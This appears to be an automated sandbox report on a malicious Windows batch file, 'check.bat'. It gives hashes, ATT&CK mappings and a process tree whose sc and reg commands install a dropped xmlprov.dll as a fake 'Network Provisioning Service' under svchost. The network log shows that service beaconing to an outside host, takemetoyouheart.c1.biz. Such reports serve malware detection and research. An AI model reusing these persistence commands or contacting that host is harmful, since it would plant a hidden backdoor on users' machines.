10109e69d1fb2fe8f801c3588f829e020f1f29c4638fad5394c1033bc298fd3f

Analysis

max time kernel
133s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
11/06/2023, 11:24 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

check.bat
Size

293B
MD5

b3f76f60fe8737a2bd098120c7495ff1
SHA1

4cd59826e2718d4e8728fc4b46f3b35fd8ee7958
SHA256

a7d5f7a14e36920413e743932f26e624573bbb0f431c594fb71d87a252c8d90d
SHA512

18422e43876d2ab81f74df50be6087b18233197cd5826f7dfbca1bf0f290d238fc440c93bbb3548867c58794286d96d6a5ce7f9e53a2d6a14cb49c72089581c9

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\xmlprov\Parameters\ServiceDll = "C:\\Windows\\System32\\xmlprov.dll"	reg.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 1 IoCs

pid	Process
2896	svchost.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\xmlprov.dll	cmd.exe
File opened for modification	C:\Windows\System32\xmlprov.dll	cmd.exe
File created	C:\Windows\System32\xmlprov.ini	cmd.exe
File opened for modification	C:\Windows\System32\xmlprov.ini	cmd.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1980	sc.exe
4644	sc.exe
2376	sc.exe
4588	sc.exe
2620	sc.exe
4944	sc.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Console\CodePage = "65001"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Console	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1276	reg.exe

Runs net.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 1864	2304	cmd.exe	79
PID 2304 wrote to memory of 1864	2304	cmd.exe	79
PID 1864 wrote to memory of 1332	1864	net.exe	80
PID 1864 wrote to memory of 1332	1864	net.exe	80
PID 2304 wrote to memory of 1980	2304	cmd.exe	81
PID 2304 wrote to memory of 1980	2304	cmd.exe	81
PID 2304 wrote to memory of 2444	2304	cmd.exe	82
PID 2304 wrote to memory of 2444	2304	cmd.exe	82
PID 2304 wrote to memory of 4212	2304	cmd.exe	83
PID 2304 wrote to memory of 4212	2304	cmd.exe	83
PID 2304 wrote to memory of 4644	2304	cmd.exe	84
PID 2304 wrote to memory of 4644	2304	cmd.exe	84
PID 2304 wrote to memory of 2376	2304	cmd.exe	85
PID 2304 wrote to memory of 2376	2304	cmd.exe	85
PID 2304 wrote to memory of 4588	2304	cmd.exe	86
PID 2304 wrote to memory of 4588	2304	cmd.exe	86
PID 2304 wrote to memory of 2620	2304	cmd.exe	87
PID 2304 wrote to memory of 2620	2304	cmd.exe	87
PID 2304 wrote to memory of 5000	2304	cmd.exe	88
PID 2304 wrote to memory of 5000	2304	cmd.exe	88
PID 2304 wrote to memory of 4984	2304	cmd.exe	89
PID 2304 wrote to memory of 4984	2304	cmd.exe	89
PID 2304 wrote to memory of 4944	2304	cmd.exe	90
PID 2304 wrote to memory of 4944	2304	cmd.exe	90
PID 2896 wrote to memory of 4504	2896	svchost.exe	92
PID 2896 wrote to memory of 4504	2896	svchost.exe	92
PID 4504 wrote to memory of 1276	4504	cmd.exe	94
PID 4504 wrote to memory of 1276	4504	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\check.bat"
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1332
- C:\Windows\system32\sc.exe
  sc stop XmlProv
  2⤵
  - Launches sc.exe
  PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo C:\Users\Admin\AppData\Local\Temp\ "
  2⤵
  PID:2444
- C:\Windows\system32\findstr.exe
  findstr /i "system32"
  2⤵
  PID:4212
- C:\Windows\system32\sc.exe
  sc query XmlProv
  2⤵
  - Launches sc.exe
  PID:4644
- C:\Windows\system32\sc.exe
  sc create XmlProv binpath= "C:\Windows\System32\svchost.exe -k XmlProv" DisplayName= "Network Provisioning Service"
  2⤵
  - Launches sc.exe
  PID:2376
- C:\Windows\system32\sc.exe
  sc description XmlProv "Network Provisioning Service"
  2⤵
  - Launches sc.exe
  PID:4588
- C:\Windows\system32\sc.exe
  sc config XmlProv type= interact type= own start= auto error= normal binpath= "C:\Windows\System32\svchost.exe -k XmlProv"
  2⤵
  - Launches sc.exe
  PID:2620
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v XmlProv /t REG_MULTI_SZ /d "XmlProv" /f
  2⤵
  PID:5000
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Services\XmlProv\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\xmlprov.dll" /f
  2⤵
  - Sets DLL path for service in the registry
  PID:4984
- C:\Windows\system32\sc.exe
  sc start XmlProv
  2⤵
  - Launches sc.exe
  PID:4944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k XmlProv
1⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\cmd.exe
  cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\system32\reg.exe
    REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Modifies registry key
    PID:1276

Network

DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

75.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

14.103.197.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.103.197.20.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

62.13.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

62.13.109.52.in-addr.arpa

IN PTR

Response
DNS

takemetoyouheart.c1.biz

XmlProv

Remote address:

8.8.8.8:53

Request

takemetoyouheart.c1.biz

IN A

Response

takemetoyouheart.c1.biz

IN A

185.176.43.106
GET

http://takemetoyouheart.c1.biz/info.php

XmlProv

Remote address:

185.176.43.106:80

Request

GET /info.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: takemetoyouheart.c1.biz
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sun, 11 Jun 2023 11:25:24 GMT
Server: Apache
Last-Modified: Wed, 19 Sep 2012 23:44:43 GMT
ETag: "6e-4ca169747d0c0"
Accept-Ranges: bytes
Content-Length: 110
Connection: close
Content-Type: text/html
DNS

106.43.176.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.43.176.185.in-addr.arpa

IN PTR

Response
GET

http://takemetoyouheart.c1.biz/info.php

XmlProv

Remote address:

185.176.43.106:80

Request

GET /info.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: takemetoyouheart.c1.biz
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sun, 11 Jun 2023 11:26:24 GMT
Server: Apache
Last-Modified: Wed, 19 Sep 2012 23:44:43 GMT
ETag: "6e-4ca169747d0c0"
Accept-Ranges: bytes
Content-Length: 110
Connection: close
Content-Type: text/html

20.189.173.9:443

322 B
7
185.176.43.106:80

http://takemetoyouheart.c1.biz/info.php

http

XmlProv

587 B
556 B
6
5

HTTP Request

GET http://takemetoyouheart.c1.biz/info.php

HTTP Response

403
185.176.43.106:80

http://takemetoyouheart.c1.biz/info.php

http

XmlProv

587 B
556 B
6
5

HTTP Request

GET http://takemetoyouheart.c1.biz/info.php

HTTP Response

403

8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

75.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

75.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

14.103.197.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.103.197.20.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

62.13.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

62.13.109.52.in-addr.arpa
8.8.8.8:53

takemetoyouheart.c1.biz

dns

XmlProv

69 B
85 B
1
1

DNS Request

takemetoyouheart.c1.biz

DNS Response

185.176.43.106
8.8.8.8:53

106.43.176.185.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

106.43.176.185.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\xmlprov.dll

Filesize
2.6MB

MD5
b693e3d2f2cab550ad4f8c5722776498

SHA1
6dc93db10d46cf777f9928803157dd16dc097e79

SHA256
f702dfddbc5b4f1d5a5a9db0a2c013900d30515e69a09420a7c3f6eaac901b12

SHA512
d5c02150265ab6d5d2d6a6e39514b345f6108afaecfd0d8e196b0b99d6d1af36245eb12e8a6879f16b619ba89f8eec442c394eff5f6298d1534c9f0084d63f18

Download Submit
\??\c:\windows\system32\xmlprov.dll

Filesize
2.6MB

MD5
b693e3d2f2cab550ad4f8c5722776498

SHA1
6dc93db10d46cf777f9928803157dd16dc097e79

SHA256
f702dfddbc5b4f1d5a5a9db0a2c013900d30515e69a09420a7c3f6eaac901b12

SHA512
d5c02150265ab6d5d2d6a6e39514b345f6108afaecfd0d8e196b0b99d6d1af36245eb12e8a6879f16b619ba89f8eec442c394eff5f6298d1534c9f0084d63f18

Download Submit
\??\c:\windows\system32\xmlprov.ini

Filesize
67B

MD5
6f287b6e63915d95be6bc6988713d83c

SHA1
13aa8bbf1a843b7cf81d6f052e83a9c3d113041a

SHA256
491ed46847e30b9765a7ec5ff08d9acb8601698019002be0b38becce477e12f6

SHA512
87a1c3cdbcb4b8d726959f988269a6df839e12e08f96b64d8221c8c056676cc91e3dd2d26b35a1cab7e526f96cd1055eb2063771f12c4d348c0796676ba4d1ca

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.